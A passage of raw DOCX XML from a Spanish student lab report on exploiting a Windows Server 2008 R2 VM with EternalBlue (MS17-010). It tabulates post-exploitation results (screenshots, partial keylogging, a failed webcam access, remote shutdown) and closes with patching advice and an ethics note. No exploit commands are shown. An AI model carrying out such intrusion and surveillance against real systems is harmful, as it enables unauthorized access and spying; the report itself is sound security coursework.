              <w:spacing w:before="0" w:after="283"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Exitosa. Se consultaron sistema, usuario, procesos, hostname e IP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="394FEBE0" wp14:textId="77777777">
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2695" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="72FAFBC0" wp14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="283"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Captura de pantalla</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6829" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="103943BA" wp14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="283"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Exitosa.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="016FFA85" wp14:textId="77777777">
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2695" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0F25BCAE" wp14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="283"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Captura de teclado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6829" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="11EDF527" wp14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="283"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Parcial: recuperó texto, pero con caracteres de control.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="10DB9BDB" wp14:textId="77777777">
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2695" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B9477F4" wp14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="283"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Acceso a la cámara</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6829" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1D215023" wp14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="283"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>No completado: la máquina virtual no reconoció ninguna cámara.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="11559028" wp14:textId="77777777">
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2695" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D97FBA8" wp14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="283"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Apagado remoto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6829" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="050EC6A9" wp14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="283"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Ejecutado; posteriormente la sesión 2 se cerró con razón “Died”.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6440C9CF" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:pBdr/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="200" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6. Conclusión</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="117CC8E6" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>La práctica demostró que el servidor Windows 2008 R2 del laboratorio era vulnerable a MS17-010. EternalBlue permitió obtener acceso remoto con privilegios altos y realizar acciones sobre el equipo objetivo. También se comprendieron los comandos para utilizar una cámara, aunque la prueba no pudo completarse por problemas de reconocimiento entre VirtualBox, Windows Server 2008 R2 y la cámara del portátil. Esto confirma la importancia de instalar actualizaciones de seguridad, deshabilitar SMBv1 cuando no sea necesario y limitar el acceso al puerto 445.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="313DC17D" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyTextnote"/>
        <w:pBdr>
          <w:left w:val="single" w:color="D6A700" w:sz="24" w:space="8"/>
        </w:pBdr>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Nota ética:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> estas pruebas se realizaron únicamente en máquinas virtuales de laboratorio autorizadas. No deben ejecutarse contra sistemas ajenos.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="116ECC03" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:pBdr/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="200" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>7. Archivos de evidencia</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1DBE0A31" wp14:textId="67D98C9D">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:leader="none" w:pos="709"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="709" w:hanging="283"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="3F0D89AA">
        <w:rPr/>
        <w:t>Registro completo: comandos kali.txt</w:t>
      </w:r>
      <w:r w:rsidR="3F0D89AA">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7F0149EA" wp14:textId="72AEE733">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:leader="none" w:pos="709"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="709" w:hanging="283"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="3F0D89AA">
        <w:rPr/>
        <w:t>Video de comandos remotos</w:t>
      </w:r>
      <w:r w:rsidR="3F0D89AA">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5A0F14B9" wp14:textId="35631892">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:leader="none" w:pos="709"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:start="709" w:hanging="283"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="3F0D89AA">
        <w:rPr/>
        <w:t>Video de captura de teclado</w:t>
      </w:r>
      <w:r w:rsidR="3F0D89AA">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7B930E51" wp14:textId="1582D2B2">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:leader="none" w:pos="709"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:start="709" w:hanging="283"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="3F0D89AA">
        <w:rPr/>
        <w:t>Video de apagado remoto</w:t>
      </w:r>
      <w:r w:rsidR="3F0D89AA">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0D46D4D4" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyTextsmall"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Los enlaces funcionan mientras el informe permanezca dentro de la misma carpeta del ejercicio y se conserve la carpeta </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>material_visual</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:type w:val="nextPage"/>
      <w:pgSz w:w="11906" w:h="16838" w:orient="portrait"/>
      <w:pgMar w:top="1191" w:right="1191" w:bottom="1191" w:left="1191" w:header="0" w:footer="0" w:gutter="0"/>
      <w:pgNumType w:fmt="decimal"/>
      <w:formProt w:val="false"/>
      <w:textDirection w:val="lrTb"/>
      <w:docGrid w:type="default" w:linePitch="600" w:charSpace="36864"/>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nsid w:val="539598ce"/>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2">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4423dcb6"/>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14:docId w14:val="611E8C9B"/>
  <w15:docId w15:val="{40FBFDC7-39AA-4EA5-8690-9EB1E2772A13}"/>
  <w:rsids>
    <w:rsidRoot w:val="02BE055C"/>
    <w:rsid w:val="02BE055C"/>
    <w:rsid w:val="035CED7D"/>
    <w:rsid w:val="08B3D746"/>
    <w:rsid w:val="08B3D746"/>
    <w:rsid w:val="09EC8201"/>
    <w:rsid w:val="119825F3"/>
    <w:rsid w:val="1CC04E4A"/>
    <w:rsid w:val="2002F233"/>
    <w:rsid w:val="24742B73"/>
    <w:rsid w:val="2B529D95"/>
    <w:rsid w:val="320DFA4E"/>
    <w:rsid w:val="387FBDC7"/>
    <w:rsid w:val="38BFDC67"/>
    <w:rsid w:val="3C84B9F4"/>
    <w:rsid w:val="3C84B9F4"/>
    <w:rsid w:val="3E956162"/>
    <w:rsid w:val="3F0D89AA"/>
    <w:rsid w:val="41A875CF"/>
    <w:rsid w:val="4C1E6D99"/>
    <w:rsid w:val="7026BA5F"/>
    <w:rsid w:val="741CD829"/>
    <w:rsid w:val="791691AA"/>
    <w:rsid w:val="7B7BADD7"/>
    <w:rsid w:val="7C19FF52"/>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324" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial;sans-serif" w:hAnsi="Arial;sans-serif" w:eastAsia="Arial;sans-serif" w:cs="Arial;sans-serif"/>
      <w:color w:val="222222"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Heading"/>
    <w:next w:val="BodyText"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="2551" w:after="283"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="17365D"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Heading"/>
    <w:next w:val="BodyText"/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:pBdr>
        <w:bottom w:val="single" w:color="9EB6CE" w:sz="2" w:space="3"/>
      </w:pBdr>
      <w:spacing w:before="200" w:after="120"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="Noto Serif CJK SC" w:cs="Noto Sans Devanagari"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="17365D"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>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color w:val="244A7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155CC"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="SourceText">
    <w:name w:val="Source Text"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Mono;monospace" w:hAnsi="Liberation Mono;monospace" w:eastAsia="Liberation Mono;monospace" w:cs="Liberation Mono;monospace"/>
      <w:shd w:val="clear" w:fill="EEF2F5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:rPr>
      <w:color w:val="1155CC"/>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color="808080" w:sz="2" w:space="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pBdr>
        <w:left w:val="single" w:color="4F81BD" w:sz="24" w:space="8"/>
      </w:pBdr>
      <w:spacing w:before="0" w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Mono;monospace" w:hAnsi="Liberation Mono;monospace" w:eastAsia="Liberation Mono;monospace" w:cs="Liberation Mono;monospace"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TableHeading">
    <w:name w:val="Table Heading"/>
    <w:basedOn w:val="TableContents"/>
    <w:qFormat/>
    <w:pPr>
      <w:suppressLineNumbers/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="17365D"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyTextok">
    <w:name w:val="Body Text.ok"/>
    <w:basedOn w:val="BodyText"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr>
        <w:left w:val="single" w:color="368A4E" w:sz="24" w:space="8"/>
      </w:pBdr>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2break">
    <w:name w:val="Heading 2.break"/>
    <w:basedOn w:val="Heading2"/>
    <w:qFormat/>
    <w:pPr>
      <w:pageBreakBefore/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyTextnote">
    <w:name w:val="Body Text.note"/>
    <w:basedOn w:val="BodyText"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr>
        <w:left w:val="single" w:color="D6A700" w:sz="24" w:space="8"/>
      </w:pBdr>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyTextsmall">
    <w:name w:val="Body Text.small"/>
    <w:basedOn w:val="BodyText"/>
    <w:qFormat/>
    <w:pPr/>
    <w:rPr>
      <w:color w:val="555555"/>
      <w:sz w:val="19"/>
      <w:szCs w:val="19"/>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jpeg" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.jpeg" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml" Id="rId16"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
  <dc:language>en-US</dc:language>
  <lastModifiedBy>Angel Santiago Diaz Rueda</lastModifiedBy>
  <revision>1</revision>
  <dc:subject/>
  <dc:title>Informe sencillo - Explotación de Windows Server 2008 R2</dc:title>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-08-16T00:04:02.0607909Z</dcterms:modified>
</coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>